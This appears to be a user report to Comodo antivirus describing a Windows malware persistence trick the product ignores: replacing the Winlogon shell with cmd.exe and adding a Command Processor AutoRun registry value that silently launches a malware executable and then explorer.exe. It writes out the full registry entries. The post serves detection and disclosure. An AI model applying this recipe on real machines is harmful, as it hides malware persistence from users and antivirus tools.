Most malwares to start with Windows are added as services, in App autostart lists or in windows scheduler.
Comodo reports some suspicious autorun entries but totally ignores another way to configure malware to be autostarted.
E.g you can add the malware as AutoRun entry of cmd rather than system autorun, configuring command processor, so it’s executed every time cmd.exe is launched.
A common used strategy usually consists of these steps:
STEP 1
As first action replace the default system shell explorer.exe with command prompt adding a windows register key in
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
with Shell entry set to cmd.exe
so windows at the start launches command prompt executable rather than explorer.exe
STEP 2
Add a register entry to configure command processor in a similar way
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="[at]mode 20,5 & tasklist /FI \"IMAGENAME eq MalwareExecutable.exe\" 2>NUL | find /I /N \"MalwareExecutable.exe\">NUL && exit & if exist \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" ( start /MIN \"\" \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" & tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit ) else ( tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit )"
So every time the cmd runs it executes the malware and starts explorer.exe.
The user doesn’t see explorer.exe is no longer the default system shell, because the command launches also explorer.exe in addition with cmd.exe with edited command processor that runs the malware executable.
Regardless the fact malware executable is detected. This kind of behavior at least should be reported as suspicious at the end of an antivirus scan.